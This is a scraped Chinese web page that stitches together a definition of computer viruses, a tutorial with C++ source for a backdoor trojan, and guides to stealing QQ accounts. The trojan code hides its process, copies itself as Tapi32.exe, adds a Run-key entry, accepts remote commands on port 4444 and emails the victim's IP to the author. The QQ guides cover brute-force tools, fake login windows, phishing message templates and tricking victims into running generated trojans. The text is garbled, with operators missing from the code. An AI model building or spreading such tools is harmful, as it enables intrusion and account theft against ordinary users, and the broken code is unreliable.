cmaedu.com

什么是黑客?什么是电脑病毒?是怎么作的?

什么是计算机病毒

cmaedu.com 计算机病毒是一个程序，一段可执行码。就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓

cmaedu.com延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时，它们就随

同文件一起蔓延开来。

除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎

cmaedu.com仅仅表现在文字和图象上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不

cmaedu.com寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。

cmaedu.com 可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散,能“传染” 其他程序

的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为

制造的程序,它通过不同的途径潜伏或寄生在存储媒体（如磁盘、内存）或程序里。当某种条件或时机成熟时,它会自生复制

cmaedu.com并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒

cmaedu.com所相似之处是能够侵入计算机系统和网络,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复

cmaedu.com制, 具有传染性。

cmaedu.com 所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质（或程序）里, 当达到某种条件时即被激活的具有对计

cmaedu.com算机资源进行破坏作用的一组程序或指令集合。

cmaedu.com参考：

cmaedu.com木马是如何编写的（一）

cmaedu.com 武汉 周侃

特洛依木马这个名词大家应该不陌生，自从98年“死牛崇拜”黑客小组公布Back Orifice以来，木马犹如平地上的惊雷，使在Dos??Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒，终于认识到的网络也有它邪恶的一面，一时间人心惶惶。

cmaedu.com 我那时在《电脑报》上看到一篇文章，大意是一个菜鸟被人用BO控制了，吓得整天吃不下饭、睡不着觉、上不了网，到处求救！呵呵，要知道，木马（Trojan）的历史是很悠久的：早在ATT Unix和BSD Unix十分盛行的年代，木马是由一些玩程式（主要是C）水平很高的年轻人（主要是老美）用C或Shell语言编写的，基本是用来窃取登陆主机的口令，以取得更高的权限。那时木马的主要方法是诱骗??先修改你的.profile文件，植入木马；当你登陆时将你敲入的口令字符存入一个文件，用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的，对网络可以说很陌生。直到Win9x横空出世，尤其是WinNt的普及，大大推动了网络事业的发展的时候，BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马（甚至在Win9x的“关闭程序”对话框可以看到进程）给了当时中国人极大的震撼，它在中国的网络安全方面可以说是一个划时代的软件。

自己编写木马，听起来很Cool是不是？！木马一定是由两部分组成??服务器程序（Server）和客户端程序（Client），服务器负责打开攻击的道路，就像一个内奸特务；客户端负责攻击目标，两者需要一定的网络协议来进行通讯（一般是TCP/IP协议）。为了让大家更好的了解木马攻击技术，破除木马的神秘感，我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马，使大家能更好地防范和查杀各种已知和未知的木马。

cmaedu.com 首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi，这里我们选用C++Builder（以下简称BCB）；VC虽然好，但GUI设计太复杂，为了更好地突出我的例子，集中注意力在木马的基本原理上，我们选用可视化的BCB；Delphi也不错，但缺陷是不能继承已有的资源（如“死牛崇拜”黑客小组公布的BO2000源代码，是VC编写的，网上俯拾皆是）；VB嘛，谈都不谈??难道你还给受害者传一个1兆多的动态链接库??Msvbvm60.dll吗？

启动C++Builder 5.0企业版，新建一个工程，添加三个VCL控件：一个是Internet页中的Server Socket，另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序，可以对外服务（对攻击者敞开大门）。Socket最初是在Unix上出现的，后来微软将它引入了Windows中（包括Win98和WinNt）；后两个控件的作用是用来使程序具有FTP（File Transfer Protocol文件传输协议）和SMTP（Simple Mail Transfer Protocol简单邮件传输协议）功能，大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。

Form窗体是可视的，这当然是不可思议的。不光占去了大量的空间（光一个Form就有300K之大），而且使软件可见，根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form，就像Delphi用过程实现的小程序一般只有17K左右那样。

我们首先应该让我们的程序能够隐身。双击Form，首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘，其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此，只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程（Service Process）就可以了。不过该函数的声明在Borland预先打包的头文件中没有，那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。

cmaedu.com 首先判断目标机的操作系统是Win9x还是WinNt：

cmaedu.comDWORD dwVersion = GetVersion();

cmaedu.com// 得到操作系统的版本号

if (dwVersion = 0x80000000)

cmaedu.com// 操作系统是Win9x，不是WinNt

cmaedu.com typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);

file://定义RegisterServiceProcess()函数的原型

cmaedu.com HINSTANCE hDLL;

cmaedu.com LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;

hDLL = LoadLibrary("KERNEL32");

cmaedu.com file://加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL

cmaedu.com lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");

file://得到RegisterServiceProcess()函数的地址

cmaedu.com lpRegisterServiceProcess(GetCurrentProcessId(),1);

file://执行RegisterServiceProcess()函数,隐藏本进程

cmaedu.com FreeLibrary(hDLL);

cmaedu.com file://卸载动态链接库

这样就终于可以隐身了（害我敲了这么多代码！）。为什么要判断操作系统呢？因为WinNt中的进程管理器可以对当前进程一览无余，因此没必要在WinNt下也使用以上代码（不过你可以使用其他的方法，这个留到后面再讲）。接着再将自己拷贝一份到%System%目录下，例如：C:\Windows\System，并修改注册表，以便启动时自动加载：

char TempPath[MAX_PATH];

cmaedu.comfile://定义一个变量

GetSystemDirectory(TempPath ,MAX_PATH);

cmaedu.com是system目录缓冲区的地址,MAX_PATH是缓冲区的大小，得到目标机的System目录路径

SystemPath=AnsiString(TempPath);

cmaedu.comfile://格式化TempPath字符串，使之成为能供编译器使用的样式

CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);

file://将自己拷贝到%System%目录下，并改名为Tapi32.exe，伪装起来

cmaedu.comRegistry=new TRegistry;

file://定义一个TRegistry对象，准备修改注册表，这一步必不可少

cmaedu.comRegistry-RootKey=HKEY_LOCAL_MACHINE;

file://设置主键为HKEY_LOCAL_MACHINE

cmaedu.comRegistry-OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);

file://打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就创建之

try

cmaedu.com file://如果以下语句发生异常，跳至catch，以避免程序崩溃

if(Registry-ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")

cmaedu.com Registry-WriteString("crossbow",SystemPath+"\\Tapi32.exe");

file://查找是否有“crossbow”字样的键值，并且是否为拷贝的目录%System%+Tapi32.exe

cmaedu.com file://如果不是，就写入以上键值和内容

catch(...)

file://如果有错误，什么也不做

好，FormCreate过程完成了，这样每次启动都可以自动加载Tapi32.exe，并且在“关闭程序”对话框中看不见本进程了，木马的雏形初现。

接着选中ServerSocket控件，在左边的Object Inspector中将Active改为true，这样程序一启动就打开特定端口，处于服务器工作状态。再将Port填入4444，这是木马的端口号，当然你也可以用别的。但是你要注意不要用1024以下的低端端口，因为这样不但可能会与基本网络协议使用的端口相冲突，而且很容易被发觉，因此尽量使用1024以上的高端端口（不过也有这样一种技术，它故意使用特定端口，因为如果引起冲突，Windows也不会报错 ^_^）。你可以看一看TNMFTP控件使用的端口，是21号端口，这是FTP协议的专用控制端口（FTP Control Port）；同理TNMSMTP的25号端口也是SMTP协议的专用端口。

cmaedu.com 再选中ServerSocket控件，点击Events页，双击OnClientRead事件，敲入以下代码：

cmaedu.com FILE *fp=NULL;

cmaedu.com char * content;

cmaedu.com int times_of_try;

char TempFile[MAX_PATH];

cmaedu.com file://定义了一堆待会儿要用到的变量

sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());

cmaedu.com file://在%System%下建立一个文本文件Win369.bat，作为临时文件使用

AnsiString temp=Socket-ReceiveText();

file://接收客户端（攻击者，也就是你自己）传来的数据

好，大门敞开了！接着就是修改目标机的各种配置了！^_^ 首先我们来修改Autoexec.bat和Config.sys吧：

cmaedu.comif(temp.SubString(0,9)=="edit conf")

cmaedu.com file://如果接受到的字符串的前9个字符是“edit conf”

int number=temp.Length();

file://得到字符串的长度

int file_name=atoi((temp.SubString(11,1)).c_str());

file://将第11个字符转换成integer型，存入file_name变量

file://为什么要取第11个字符，因为第10个字符是空格字符

cmaedu.com content=(temp.SubString(12,number-11)+'\n').c_str();

cmaedu.com file://余下的字符串将被作为写入的内容写入目标文件

cmaedu.com FILE *fp=NULL;

char filename[20];

cmaedu.com chmod("c:\\autoexec.bat",S_IREADS_IWRITE);

cmaedu.com chmod("c:\\config.sys",S_IREADS_IWRITE);

cmaedu.com file://将两个目标文件的属性改为可读可写

if(file_name==1)

cmaedu.com sprintf(filename,"%s","c:\\autoexec.bat");

cmaedu.com file://如果第11个字符是1,就把Autoexec.bat格式化

else if(file_name==2)

sprintf(filename,"%s","c:\\config.sys");

file://如果第11个字符是1,就把Config.sys格式化

times_of_try=0;

cmaedu.com file://定义计数器

cmaedu.com while(fp==NULL)

cmaedu.com file://如果指针是空

fp=fopen(filename,"a+");

file://如果文件不存在，创建之；如果存在，准备在其后添加

file://如果出错，文件指针为空，这样就会重复

times_of_try=times_of_try+1;

cmaedu.com file://计数器加1

cmaedu.com if(times_of_try100)

cmaedu.com file://如果已经试了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

cmaedu.com file://跳至END处

cmaedu.com fwrite(content,sizeof(char),strlen(content),fp);

cmaedu.com file://写入添加的语句，例如deltree/y C:或者format/q/autotest C:，够毒吧？！

cmaedu.com fclose(fp);

file://写完后关闭目标文件

Socket-SendText("Sucess");

file://然后发回“Success”的成功信息

cmaedu.com上回我们讲到如何修改目标机上的启动配置文件，这回我们就来查看目标机上的目录树和文件吧，这在客户端上使用“dir”命令，跟着敲?：

cmaedu.comelse if(temp.SubString(0,3)=="dir")

cmaedu.com file://如果前3个字符是“dir”

int Read_Num;

char * CR_LF="\n";

cmaedu.com int attrib;

cmaedu.com char *filename;

DIR *dir;

struct dirent *ent;

cmaedu.com int number=temp.Length();

cmaedu.com file://得到字符串的长度

AnsiString Dir_Name=temp.SubString(5,number-3);

cmaedu.com file://从字符串第六个字符开始，将后面的字符存入Dir_Name变量，这是目录名

if(Dir_Name=="")

file://如果目录名为空

Socket-SendText("Fail By Open DIR's Name");

file://返回“Fail By Open DIR's Name”信息

cmaedu.com goto END;

file://跳到END

char * dirname;

cmaedu.com dirname=Dir_Name.c_str();

if ((dir = opendir(dirname)) == NULL)

cmaedu.com file://如果打开目录出错

cmaedu.com Socket-SendText("Fail by your DIR's name!");

cmaedu.com file://返回“Fail By Your DIR's Name”信息

goto END;

file://跳到END

cmaedu.com times_of_try=0;

while(fp==NULL)

cmaedu.com file://如果指针是NULL

fp=fopen(TempFile,"w+");

cmaedu.com file://就创建system\Win369.bat准备读和写；如果此文件已存在，则会被覆盖

times_of_try=times_of_try+1;

cmaedu.com file://计数器加1

if(times_of_try100)

cmaedu.com file://如果已经试了100次了，仍未成功（真有耐心！）

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

while ((ent = readdir(dir)) != NULL)

cmaedu.com file://如果访问目标目录成功

cmaedu.com if(*(AnsiString(dirname)).AnsiLastChar()!='\\')

file://如果最后一个字符不是“\”，证明不是根目录

cmaedu.com filename=(AnsiString(dirname)+"\\"+ent-d_name).c_str();

cmaedu.com file://加上“\”字符后将指针指向目录流

cmaedu.com else

filename=(AnsiString(dirname)+ent-d_name).c_str();

file://如果是根目录，则不用加“\”

cmaedu.com attrib=_rtl_chmod(filename, 0);

cmaedu.com file://得到目标文件的访问属性

cmaedu.com if (attrib FA_RDONLY)

cmaedu.com file://“”字符是比较前后两个变量，如果相同返回1,否则返回0

fwrite(" R",sizeof(char),3,fp);

cmaedu.com file://将目标文件属性设为只读

cmaedu.com else

fwrite(" ",sizeof(char),3,fp);

cmaedu.com file://失败则写入空格

cmaedu.com if (attrib FA_HIDDEN)

cmaedu.com fwrite("H",sizeof(char),1,fp);

cmaedu.com file://将目标文件属性设为隐藏

cmaedu.com else

fwrite(" ",sizeof(char),1,fp);

cmaedu.com file://失败则写入空格

if (attrib FA_SYSTEM)

cmaedu.com fwrite("S",sizeof(char),1,fp);

cmaedu.com file://将目标文件属性设为系统

cmaedu.com else

cmaedu.com fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_ARCH)

fwrite("A",sizeof(char),1,fp);

file://将目标文件属性设为普通

else

fwrite(" ",sizeof(char),1,fp);

file://失败则写入空格

if (attrib FA_DIREC)

cmaedu.com fwrite(" DIR ",sizeof(char),9,fp);

cmaedu.com file://将目标文件属性设为目录

cmaedu.com else

fwrite(" ",sizeof(char),9,fp);

file://失败则写入空格

fwrite(ent-d_name,sizeof(char),strlen(ent-d_name),fp);

cmaedu.com file://将目录名写入目标文件

fwrite(CR_LF,1,1,fp);

file://写入换行

fclose(fp);

cmaedu.com file://关闭文件

cmaedu.com closedir(dir);

file://关闭目录

cmaedu.com FILE *fp1=NULL;

cmaedu.com times_of_try=0;

cmaedu.com while(fp1==NULL)

fp1=fopen(TempFile,"r");

cmaedu.com file://打开Win369.bat准备读

cmaedu.com times_of_try=times_of_try+1;

file://计数器加1

if(times_of_try100)

cmaedu.com file://如果已经试了100次了，仍未成功

Socket-SendText("Fail By Open File");

file://就发回“Fail By Open File”的错误信息

goto END;

file://并跳到END处

AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

cmaedu.com file://定义的一个空数组

Read_Num=fread(temp_content,1,300,fp1);

file://从目标文件中读入前300个字符

cmaedu.com while(Read_Num==300)

Return_Text=Return_Text+temp_content;

变量加上刚才的300个字符

for(int i=0;i300;i++) temp_content[i]='\0';

Read_Num=fread(temp_content,1,300,fp1);

file://重复

cmaedu.com Return_Text=Return_Text+temp_content;

cmaedu.com 变量加上刚才的300个字符

cmaedu.com fclose(fp1);

cmaedu.com file://关闭目标文件

cmaedu.com Socket-SendText(Return_Text);

cmaedu.com file://返回Return_Text变量的内容

cmaedu.com 够长吧？！察看目录树这么费劲啊？！你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了，Client将使用“type”命令，（手指累不累啊？）：

cmaedu.comelse if(temp.SubString(0,4)=="type")

file://如果前4个字符是“type”

int Read_Num;

int number=temp.Length();

cmaedu.com AnsiString File_Name=temp.SubString(6,number-4);

cmaedu.com file://将目标文件流存入File_Name变量中

times_of_try=0;

while(fp==NULL)

fp=fopen(File_Name.c_str(),"r");

file://打开目标文件准备读

cmaedu.com times_of_try=times_of_try+1;

cmaedu.com file://计数器加1

cmaedu.com if(times_of_try100)

cmaedu.com file://如果已试了100次了

cmaedu.com Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的错误信息

cmaedu.com goto END;

cmaedu.com file://跳到END

cmaedu.com AnsiString Return_Text="";

char temp_content[300];

for(int i=0;i300;i++) temp_content[i]='\0';

cmaedu.com file://定义一个空数组

Read_Num=fread(temp_content,1,300,fp);

cmaedu.com file://从目标文件中读入前300个字符

while(Read_Num==300)

cmaedu.com Return_Text=Return_Text+temp_content;

的内容加上刚才的字符

cmaedu.com for(int i=0;i300;i++) temp_content[i]='\0';

cmaedu.com Read_Num=fread(temp_content,1,300,fp);

file://重复

cmaedu.com Return_Text=Return_Text+temp_content;

的内容加上刚才的字符

fclose(fp);

cmaedu.com file://关闭目标文件

Socket-SendText(Return_Text);

cmaedu.com file://返回Return_Text的内容，即你查看文件的内容

咳咳！累死了！还是来点轻松的吧??操纵目标机的光驱（注意：mciSendString()函数的声明在mmsystem.h头文件中）：

cmaedu.comelse if(temp=="open")

file://如果收到的temp的内容是“open”

cmaedu.com mciSendString("set cdaudio door open", NULL, 0, NULL);

cmaedu.com file://就弹出光驱的托盘

cmaedu.comelse if(temp=="close")

cmaedu.com file://如果收到的temp的内容是“close”

cmaedu.com mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);

cmaedu.com file://就收入光驱的托盘。当然你也可以搞个死循环，让他的光驱好好活动活动！^_^

cmaedu.com 接着就是交换目标机的鼠标左右键，代码如下：

else if(temp=="swap")

SwapMouseButton(1);

cmaedu.com file://交换鼠标左右键，简单吧？

然后就是使目标机重新启动。但这里要区分WinNt和Win9x??NT非常注重系统每个进程的权利，一个普通的进程是不应具备有调用系统的权利的，因此我们要赋予本程序足够的权限：

cmaedu.comelse if(temp=="reboot")

file://如果收到的temp的内容是“temp”

cmaedu.com DWORD dwVersion = GetVersion();

cmaedu.com file://得到操作系统的版本号

cmaedu.com if (dwVersion 0x80000000)

file://操作系统是WinNt，不是Win9x

HANDLE hToken;

TOKEN_PRIVILEGES tkp;

file://定义变量

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, hToken);

这个函数的作用是打开一个进程的访问令牌

cmaedu.com 函数的作用是得到本进程的句柄

LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,tkp.Privileges[0].Luid);

cmaedu.com 的作用是修改进程的权限

cmaedu.com tkp.PrivilegeCount = 1;

file://赋给本进程特权

cmaedu.com tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

cmaedu.com AdjustTokenPrivileges(hToken, FALSE, tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);

的作用是通知Windows NT修改本进程的权利

cmaedu.com ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);

file://强行退出WinNt并重启

cmaedu.com else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);

file://强行退出Win9x并重启

如果以上都不是，就让它在Dos窗口中执行传来的命令：

else

file://如果都不是

cmaedu.com char * CR_TF="\n";

times_of_try=0;

cmaedu.com while(fp==NULL)

fp=fopen(TempFile,"w+");

cmaedu.com file://创建Win369.bat，如果已存在就覆盖

cmaedu.com times_of_try=times_of_try+1;

cmaedu.com file://计数器加1

if(times_of_try100)

cmaedu.com Socket-SendText("Fail By Open File");

file://返回“Fail By Open File”的信息

goto END;

file://跳到END

fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);

cmaedu.com file://写入欲执行的命令

fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);

file://写入换行符

cmaedu.com fclose(fp);

file://关闭Win369.bat

system(TempFile);

cmaedu.com file://执行Win369.bat

Socket-SendText("Success");

cmaedu.com file://返回“Success”信息

cmaedu.com 你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况（判断是否是一个企业的局域网），然后可以进一步攻击，比如Deltree和Format命令。^_^

cmaedu.com 到此，服务器程序的功能已全部完成，但还差容错部分未完成,这样才能避免程序因意外而崩溃。朋友，别走开！（未完待续）

cmaedu.com 木马是如何编写的（三）

cmaedu.com 武汉 周侃

cmaedu.com 上次已编写完服务器端的各种功能，但还差容错部分还未完成,下面我们Go on! 其代码如下（照敲不误 ^_^）：

cmaedu.comEND:;

Socket-Close();

cmaedu.com file://关闭服务

ServerSocket1-Active =true;

cmaedu.com file://再次打开服务

if (NMSMTP1-Connected) NMSMTP1-Disconnect();

cmaedu.com file://如果SMTP服务器已连接则断开

cmaedu.com NMSMTP1-Host = "smtp.163.net";

file://选一个好用的SMTP服务器，如163、263、sina和btamail

NMSMTP1-UserID = "";

file://你SMTP的ID

cmaedu.com try

NMSMTP1-Connect();

file://再次连接

catch(...)

cmaedu.com goto NextTime;

file://跳到NextTime

cmaedu.com NMSMTP1-PostMessage-FromAddress ="I don't know!";

file://受害者的Email地址

NMSMTP1-PostMessage-FromName = "Casualty";

cmaedu.com file://受害者的名字

NMSMTP1-PostMessage-ToAddress-Text = "crossbow@8848.net";

file://将信发到我的邮箱，这一步很关键

cmaedu.com NMSMTP1-PostMessage-Body-Text = AnsiString("Server Running on:") + NMSMTP1-LocalIP ;

cmaedu.com file://信的内容提示你“服务器正在运行”，并且告诉你受害者的目前的IP地址，以便连接

NMSMTP1-PostMessage-Subject = "Server Runn

（计算机网络问题）请结合 SMTP协议解释下面的问题是怎么回事？（求详细解答）

cmaedu.comSMTP协议属于TCP/IP协议簇，它帮助每台计算机在发送或中转信件时找到下一个目的地。通过SMTP协议所指定的服务器,就可以把E-mail寄到收信人的服务器上了，整个过程只要几分钟。SMTP服务器则是遵循SMTP协议的发送邮件服务器，用来发送或中转发出的电子邮件。

cmaedu.com它使用由TCP提供的可靠的数据传输服务把邮件消息从发信人的邮件服务器传送到收信人的邮件服务器。跟大多数应用层协议一样，SMTP也存在两个 端：在发信人的邮件服务器上执行的客户端和在收信人的邮件服务器上执行的服务器端。SMTP的客户端和服务器端同时运行在每个邮件服务器上。当一个邮件服 务器在向其他邮件服务器发送邮件消息时，它是作为SMTP客户在运行。

cmaedu.com出现这种问题，很多种可能我遇到过的就是服务器被侵入了，这是最牛逼的是最不常见的，因为只有黑客才会使用，还有一种可能因为没有结合证书发送时候被匿名篡改了，应为有病毒我首先怀疑有黑客侵入了服务器

cmaedu.com

我QQ被朋友盗了，可过了很多天都找不到他，我想盗回来，顺便把他的也盗掉，谁教我一下啊

朋友 到别人QQ首先是不好的行为 再就是如果你真想这么做的话就

cmaedu.com1、在线密码破解 大家知道QQ可以利用代理服务器登录，这是一种保护措施。它不仅可以隐藏用户的真实IP地址，以避免遭受网络攻击，还可以加快登录速度，保证登录的稳定性。

cmaedu.com在线密码破解和本地密码破解采用的技术方法类似，都是穷举法，只不过前者完全脱离了本地用户使用的QQ。它通过对登录代理服务器进行扫描，只要想盗的QQ号码在线，就可利用在线盗号工具实现远程TCP/IP的追捕，从而神不知鬼不觉地盗取QQ密码！

cmaedu.com在线破解改变了本地破解那种被动的破解方式，只要是在线的QQ号码都可以破解，适用范围较广。但是由于它仍然采用穷举法技术，所以在枚举密钥位数长度以及类型时，校验时间很长，破解效率不高。同样，这种方法还受到电脑速度、网速等诸多因素的影响，因此比前面的本地破解更麻烦。

目前功能比较强大的一款QQ密码在线破解软件叫QQExplorer。它的破解操作分四步：第一步，在QQ起始号码和结束号码中填上想要盗取的QQ号码（此号码必须在线）；第二步，在“添加或删除HTTP代理服务器”中输入代理服务器的IP地址和端口号码（如果你嫌自己寻找QQ代理服务器麻烦，可以使用一些现代的QQ代理公布软件）；第三步，点击“添加测试”按钮，软件先自动检测此服务器是否正常，确定后将它加入代理服务器列表（此软件可填入多个代理服务器的地址，并且能够自动筛选不可用或者速度慢的服务器）；第四步，点击“开始”按钮，开始在线密码破解

cmaedu.com2、登录窗口破解

伪造QQ登录窗口的盗号方法非常简单，这是一种比较另类的木马破解方法（后面对木马破解有专门讲述）。先用盗号软件生成一个伪装的QQ主程序，它运行后会出现跟腾讯QQ一模一样的登录窗口，只要用户在这个伪登录窗口中登录，输入的QQ号及密码就会被记录下来，并通过电子邮件发送到盗号者指定的油箱中，在此以一款叫“狐Q”的软件为例，首次运行它时，它会把自身复制到QQ目录中，并把原来的QQ.exe文件改名为QQ.com（这样的更改不会影响QQ的正常运行）。设置完毕后，“狐Q”的原程序就会消失，伪装成QQ等待“猎物”上钩在其软件设置中，有一项设置可以决定真假QQ交替运行的次数，可以减少用户在使用QQ时产生的怀疑。比如说将“生效次数”设定为3，那么用户第一次运行的是真QQ了，也就是说在第三次运行时，用户的QQ号便被盗了！在QQ密码发送的过程中，如果发送失败，它还会把QQ号和密码记下来，等待下一次发送。

cmaedu.com即时监视QQ登录窗口的盗号方法利用Windows窗口函数、句柄功能实现QQ号和密码的后台截取。此类软件几乎可以捕获Windows下所有标准密码框中的密码，如QQ、Outlook、屏幕保护程序、各种电子邮件客户端、各种游戏账号和上网账号等。捕获后，它也会将密码实时发送到盗号者指定的邮箱中。其代表性的盗号软件是“密码使者”，它几乎可以捕获Windows 9x/2000/XP下所有登录窗口中的密码，并且还能够盗取在网页中登录的各种密码。盗号在使用这款软件时，只须填上用于接收别人QQ密码的邮箱地址及保护密码，并把生成的盗号器文件传过去哄骗别人运行，然后就可以坐等密码上门！此软件与传统的键盘记录器不同，它在电脑每次开机时隐藏自启动，不管密码是用键盘输入的，还是复制、粘贴的，都能够有效地实时拦截！其注册版本居然还带有自动升级的功能，破坏力十分巨大。

cmaedu.com3、消息诈骗

孔子曰：上士杀人用笔端，中士杀人用语言，下士杀人用石盘。远程盗取QQ密码还有一种大家最常见也是最简单最有效的方法，那就是利用不少人爱贪小便宜的弱点，进行人为的欺骗！

cmaedu.com标题:腾讯关于xxxxx获奖通知

“QQ幸运儿：恭喜！！！您已经成为QQ在线网友齐抽奖的中奖用户。您将获赠精美T恤1件，并有机会得到NOKIA 7110手机1部。腾讯公司(tencent.com)注：奖品是以邮寄方式寄出，请您认真填写以下资料。如果填写错误，将被作为自动放弃获奖机会处理。 QQ号码： 密码： 姓名： E-mail地址： 身份证号码： 通讯地址： 联系电话： 邮编：”

cmaedu.com比如我们的QQ经常会收到如下的陌生人消息。

如果你真的如实填写这些资料并傻傻的发送回去，不一会儿QQ密码就被盗了。

还有类似这样的消息：“亲爱的 号QQ用户，恭喜你你已经成为腾讯的幸运号码，腾讯公司送你QQ靓号：12345，密码：54321。请尽快登陆并修改密码，感谢您对腾讯公司的支持！”不少人一看，以为白捡的便宜来了，登录一试还是真的，于是就大大咧咧地笑纳了。但是，很多人为了方便，不管什么东西都爱使用相同的密码，所以当这个QQ号的密码被你改为与自己QQ号相同的密码时，自己QQ号的连同这个赠送的QQ号都得玩完！这是因为，赠送的QQ号已被盗号者申请过密码保护，当你更改密码后他就利用腾讯的密码保护功能把它收了回去，同时也收走你的QQ密码。如果你的QQ没有申请过密码保护，此刻就只能和它永别了。

cmaedu.com4、更多的木马破解

cmaedu.com“古希腊大军围攻特洛伊城，久攻不破，遂造一大木马藏匿将士于其中，大部队假装撤退而弃木马。城中得知敌退，将木马作战利品拖入城内。午夜时分，匿于木马中的将士开启城门四处纵火，城外伏兵涌入，里应外合，焚屠特洛伊城。”这是古希腊神话《木马屠城记》的故事，其中那只木马被黑客程序借用其名，表“一经潜入，后患无穷”之意。一个完整的木马程序由服务器端和控制端组成。所谓“中了木马”，是指用户的电脑中被安装了木马的服务器端，而拥有控制端的盗号者就通过网络远程控制该电脑，从而轻而易举地盗得该电脑中的QQ密码。

cmaedu.com针对QQ的木马程序多不胜数，其中专门盗取QQ密码的也有一大堆，它们被偷偷地安装在用户的电脑中，随电脑启动而自动运行，如果用户使用QQ，那么其账号和密码就会被这些木马记录下来，并发送到木马安装者的邮箱中。前面已经介绍了两款通过登录窗口盗号的QQ木马，下面再介绍两款典型的。

第一款：极品QQ盗号2004

这是“极品QQ盗号”木马的最新版本。它的使用方法跟前面介绍的“密码使者”差不多，先再“设置”栏中填入接收QQ密码的邮箱地址和发送邮件的标题，然后把生成的盗号器偷偷地安装到别人的电脑里这个木马声称可以避过主流的杀毒软件，盗取QQ最新版本的密码，即QQ2004和QQ2004奥运特别版的密码。

cmaedu.com第二款：QQ间谍3.0

cmaedu.com使用此木马软件时，点击工具条上的“服务端”，按照提示生成服务端程序，然后把它偷偷地传到别人的电脑中，当受害者不小心运行了它，木马就被种上了。这个木马不仅可以盗号，还能悄悄地在后台记录受害者的QQ聊天信息，并下载可执行文件实现远程升级和远程执行脚本程序。另外再注册之后，它还可以直接远程监控对方电脑上的QQ聊天记录。

cmaedu.com利用木马软件盗取QQ密码，显然比用前面介绍的那些破解方法更有效率！不仅节省时间，而且成功率也高。但是，如何把木马程序的服务器端安装在用户的电脑中，这是一个费心思的事儿。另外，很多功能强大的木马程序都是需要花钱注册，才能使用其全部功能。因此，对于那些水平参差不齐的盗号者而言，要想玩转木马程序，还得费点劲。

主动出击 教你夺回被人盗走的QQ号

cmaedu.com随着网络的普及，如今很多朋友最重要的交流方式都是QQ，但是QQ安全是一个大家都非常关心的话题，盗取QQ号的工具也是层出不穷，随着近年来大家安全意识的提高，大家对QQ安全有了一定的重视，但是所谓黑客借助一些工具盗取QQ号同样是非常容易的事，下面就来看看黑客是如何利用工具软件结合邮箱轻松盗取他人的QQ号码的，以便我们更加有效地防范！

cmaedu.com一、QQ密码发送者

该软件使用比较简单，你需要具有一定的“欺骗”能力，要想成功，最关键的在于如何想方设法让对方接收并运行你的木马，然后你就可以“坐收渔利”了！

下载并解压该软件，运行其中的可执行文件，运行窗口如图1。

　在此窗口中，你只要输入一个有效的邮箱，然后点击“生成QQ木马”按钮即可生成一个木马，如图2。

　接下来就是把该木马发送给对方，要能让对方运行，你需要将改木马改名，比如改名为“我的FLASH”、“XX软件”等，只要能让对方信任你并点击运行该木马即可！

一旦对方运行了该软件，并再次登陆QQ，那么对方的QQ号码、密码以及对方机器IP等信息都会通过邮件发送到你设置好的邮箱，你就等着查看自己的“战功”吧，如图3。

　提示：

